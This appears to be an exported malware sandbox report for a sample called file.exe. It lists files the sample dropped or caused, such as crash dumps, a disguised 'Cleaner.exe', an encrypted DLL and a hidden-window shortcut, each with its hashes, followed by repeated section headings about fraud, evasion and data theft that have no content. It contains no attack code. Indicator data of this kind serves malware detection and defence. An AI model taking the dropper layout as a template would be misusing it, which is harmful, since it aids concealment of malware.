C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_19a29c4013ef4dd44ec0ddb13aa79330f349af61_440dec59_0f5aa088\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	47885273E046E9CF2253FB23800F2B4E	F4699B6698FEA95A6E1255A4F43DC33422FBB036	B6C978A12DDAC96E47DC9E5D373EB09537CCE6C063EC808D99291583365E557A
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_050a1b5a\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	A40D3063D78F2982A383CB5C50311B6C	924CB5A083E7E29127B9CBC03A674E16EBC4156E	56EAFDA88322346DA6A302F4526E4CBB4CBEF54D5BEE2EE7CA3C140A49F05543
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_11c5ac93\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F3F36BBB55F6E790A86DBA1F15B9A00B	49AC90E23C1F9D8B0F6CD11D9FC4CD0F66F44466	4BA7004A41F766ABFA91086987DBA184975D827A94DDCE79BBC1FB214169FFD5
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_12a5b81c\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F90783CAE54A721754D4F10AADB5ACBA	ADBFD87A7D89F88513561BEA08B3371E5EF530AC	F257E6F28AA994BDC0B69B789D2FEE724C6089019B53624E1C74266DF8663BCA
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_14656e32\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	8A9E5C963519858FE9A11A13F26E714A	A0221695263B3BE0CD6A3474E5F747983851E278	5BF7D4DF1698DD1B6A0081B38BBC8502A87DF63DCBB0A276AF213AC3E372A650
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_15d97769\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	76A796C2F3296468940F32C2F35F290B	21307E70E4EABFE4DFAE85644A78512E7B4D1077	46A9C4967C63201820BCB10FE5AF42D0ABB56CF60B59F9927806189966ECB3CA
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_16118592\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	3DB8FE3AF6AB3B151DA2FF2464C75598	E53BF3BB43AEEA6A1B0B36C3D4BFD0595F120EBF	2E590CB8B33552CEA3EFCB52E3754187B952FEF69236E7ADEF1984F47563A9D3
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_1669c460\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	1B5B1DD6F38DC79A13924EE31E530FFA	578409C4389884037F095A9DEE9147DD7F21DCCF	28C9846E48651E67935DBA147B7B0A9954EB42E97521068E08DC9D01A1BF1BEE
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_167963e1\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	A181BCB38630327512C0392B681B8817	E14E7BD366AFD36B5EF879BFB37227733870A54B	3346D03DC9BAF42461F45AE80523ED776B2857EF4E9F510152B3F98968C64912
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_17059f44\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	7DB187678B90E69F643A256C73D8FB98	39DCC475A02696D724E826957DC62EFE486DAD30	7EEE436EA17E5F6D286FF2279DC7ABAE5E12721FD46C37A45AE2EB3F3108F1E5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1455.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:51 2022, 0x1205a4 type	7B8E0CF31A1D83FCE1AD7703BC66326B	A8EC8B6D9EA928F15DA63334290FF7ED191D1EDA	1E4805447347214F5EDE9E9B8B34E023B0723E7E1340EC6A1C7361FD4A4E409A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER19C5.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	CC20ADE9E9BD1A3774B210796DC997D5	CDC7E9842A42888C2CBC3FB0878B066862DB218E	AF2685AA560EDF48A470DF7A0D28AF60271EC6DEB686B5E151E45B74A3D177E2
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A91.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F11AB740C2425A44E7801C6CBC141A3D	4D38F93016F908EF4EF5F0055511620EE393B763	DB78236DD556454B1FDD6978367FF1D1F3B2886CA83ED5927381F935AF69CCDC
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6095.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:05 2022, 0x1205a4 type	27801B40096192ED17A6D203766DC54D	A100C0A471F04F07447CD50028D37D878044B2A8	553A7B782630C5BB578C6352CC044C44D6680E4DB37FB7AB946FEDB69D162E4D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E8.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	91FDE7D985825C6B53117B791E07A8D6	6E63C6405EB66F03F0E57F8D74A5148ED96140E1	87727A8CB08AD3D3BCAE74FF4772FA60C3EC1E090C7904808ADAA1800CC01485
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6385.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	7FC287076531EE62E457E6EEC8214486	A5207F6E33E51F79CD11D765C86FA3093299F209	103C52FF99EF33CC62D2E11A5C99791DDB9FBA55C7C508A010114F8BADB0259C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B15.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:08 2022, 0x1205a4 type	F7B153CFEC0ACEBD1ED8B70D17B9340A	48D7C4201CFF584735B9C4CA6280025D5844D3E7	421C3361B597466600388ABB822CD80C53C26767F43BB6E780AB9169BC74569C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D39.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	EB101CCD26A52D0C7114A3B08B5B2A61	D147122AB36D17CCAC10415460C66ECC49D03B24	BD0CE9164045F5392DD9801F34E4945553D87D1D7426240A9649809A70AD99AB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DC6.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F6B7E8F49AA43131D5EFFE56976643C8	5D6EAC7D7B6F1AE18693722E322D62A378C2B1B0	B5AA1C5B25A6B847C96489F63F383F9F09B8A22D55B40D67A82DA7B33163082C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER73B0.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:10 2022, 0x1205a4 type	C010EA8A0634D8BA3D4021BA5211D5BC	573532933C5B3D3DD2E297F58976BBE087485AFA	D6134E749C4815BB253D650AC1B4EF97A7DC9405D00898E6F91DF02E434651E4
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7632.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	99229F3B9EC8CACF8B0E3AF707C090DD	B5BBB092893720A437166FAB783097709D1B639C	50DC2208A954F29C6C8ABEA57808F44601978AB6CE0E4E4FCEF550C967BA9423
C:\ProgramData\Microsoft\Windows\WER\Temp\WER76CF.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	5853C04112C7D101464A80E9911823D8	0C751F203D0528683B5CA00B4F8B0B91DEA0D043	98A3125A6DBE881651C2F5B5AB942A5FDF41FFA5CA8670EEE563316C38392537
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F87.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:13 2022, 0x1205a4 type	934E60D0897B97BCFB63AF232B0936C7	9E8CCAB034A3F18F6F23D039AE789897A0490D6E	A803A868276950AEFF0530C4340B02ADD05567254E00E9DE50DA043C4AE38362
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8209.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	3DAE7B32A2A393D20635E02AFFF0998E	F963C42C10FB42E885A53A9D70FFA9A845ED4E9C	F0A07E8BFE0E67E09CF9FC22C3A116AF04D557E193D50986896E9B909ACC9218
C:\ProgramData\Microsoft\Windows\WER\Temp\WER83CF.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	A2D968C7066562D3C0C554DC56259D0B	2804EEED188AF4DB05B2CBDFC5189136A98C743B	2AEFAD63EF21C9EBFFAAC8109A29BBE3F684CAABD90F079F5DB3CC1E8E2712AA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER99E1.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:33:26 2022, 0x1205a4 type	C0ABF883DE8CA88D30E561D728EE0ADA	42A484F64C4C1E8548F9746B774D0F8A959803F3	DC0842291C67C964B6B4C9A10A5E09980A144BF1AE2F2E2B1737596CF1A730AE
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A91.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:20 2022, 0x1205a4 type	F212FF51EE38B4D31D2AAE1E0D90A2B5	58463935BFA2EE61338020546D21A4E1F4C0E91A	4297FD8421CCE432513AFA02430CD875A91229C86D599FF6504DF0062D5EA5B5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D51.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	16EEAA4B3326849450F4817162A745C5	1A6365771D038FC1041C32E0FC2A308355466155	28AD7E83812A14E5D9D5B6AB59407F48BF0E20C74217C370AE3805633CEBFA5B
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EAA.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	4846B810F3F30A775E63E4EE6F3C95C3	CBA2B21637A19FA1DA515B3B5F475528CD86A967	A7546014200D6A93E9357E5E2EEC488A5A0313346CE2D4430335B60D533F753F
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EF2.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	A143CDBC5C625A98DD040606E5AE9ECA	6811091944DB4DCA934D3F75D537E858C3A52655	B633BF27E6595F2EC6621FA0C10A47BDAA2B4747D5F8D9DC944EA417478B17D5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FBF.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	FB37F1F09DEBCB91F32273D0B7C179AE	517ECF53279353A97C6535F238D9882F61FC4398	62BB8C1638AFA7EA7E5A39EED9CEB8F9C1DE4383C6A5A0B470E7A923DDEDF5A8
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA688.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:23 2022, 0x1205a4 type	A878D36D0648EA35F5883DA30AFBBBC3	3CDD8C0B168CB4C53B0F296F5EDA5870E10E79E3	96A919B80C8D1A4A41641B1750171DA12FC9F2AEC90BEE6D35B950676757E977
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB3C.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	18B0CE3057D005D22F8C210B16C96C8D	AA979E74A802666AD8F3878B8582AFD6E30B507B	A670EF8079D00859411DFBD5BB8EF08C105E50753F6DC5914E9FAA30A567DF00
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC08.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	0C58F25AFE3E1C6894F5454946ABAFCF	3607B0A3CA164407C98B45AF5E1AA5E0FBD4BB61	CEE6E175E5E0A59020B9611870BF8629F3FBB88BDBB0540CBF8CA5390A5D74EE
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2DC.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:26 2022, 0x1205a4 type	F5205326F694B498FC62B08FEC394882	DC722921CD4B6D5960E6B0446F498EDB94D26A39	D28147703B196C3E3DBA5826B6AA9A3F959CA0CBBD3A8C814C024F55495FA779
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB696.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	A2F64871DA310EFC9B560E47AC78466D	961A61B4B336E735EA1F16088133CA2D58A55053	8BECC6B77CE55C064B93203872019CEEC94E8568FB6831802680F8A27EE53F06
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB753.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	22E54DA3E1222B8F05D7009D64FAA29A	B471AE3CFB3724AE7222AB764CB01CE09938E43A	638AE081A3666B3C9A9C790923EBF7D469150C89ED8DF16E2B2D673F514B554A
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC078.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:30 2022, 0x1205a4 type	637A1509F346A73DDC6B9274F54186F5	A55677D9B0B38C35B7A8104E83E2E7BA9131B587	F014098F9A771AC3A146F2F697CDD8EFFC513E7A859A930C0498E7DC3C7D84D7
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC367.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	B19342F466CD0A06590350CE2C402942	4B52815A2404C3D64F47FA96E525BC94187BD0DE	FE0154F99C4803C6963499E8D7798F1ADB38D842773C5B311309948F08230EB5
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3F5.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	D4186F0DA540E4F1DAA3CCFF8C5D5B46	A7C04F491BA20FAF33A6E23398EDA9DFD5BDA506	16F0EAF110D56AAF68763B913568BF74AC29A584263FB881C9816384E97C5AF0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].htm	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	04514BD4962F7D60679434E0EBE49184	1493A5447EB8156A7D7AECFF60EE8BFBA2209526	C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	2ECB51AB00C5F340380ECF849291DBCF	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\library[1].htm	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ping[1].htm	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ping[1].htm	ASCII text, with no line terminators	064DB2A4C3D31A4DC6AA2538F3FE7377	8F877AE1873C88076D854425221E352CA4178DFA	0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fuckingdllENCR[1].dll	data	418619EA97671304AF80EC60F5A50B62	F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6	EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ping[1].htm	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	2ECB51AB00C5F340380ECF849291DBCF	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	04514BD4962F7D60679434E0EBE49184	1493A5447EB8156A7D7AECFF60EE8BFBA2209526	C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
C:\Users\user\Desktop\Cleaner.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:32:49 2022, mtime=Mon Oct 3 23:32:49 2022, atime=Mon Oct 3 23:32:49 2022, length=3947920, window=hide	483C98CF1CB11B75492EC1E87EAD579E	C340FA4A80E8E68646FB4639E5BBC9BADC0790FA	4EFADB182AC6A3E740F46E4E19E8C59E71E48EC9E2E5588075EEC5F6977EBD5C
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	5B9EF849950CAD433973C4131ADA8B70	42FB4DCC45C07666D1C8C7B7A595C935111F8F45	245B6DCC178CFDA8757782676BBE9EC3B7297FBC3115A5AED7416F3FB68B0539

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe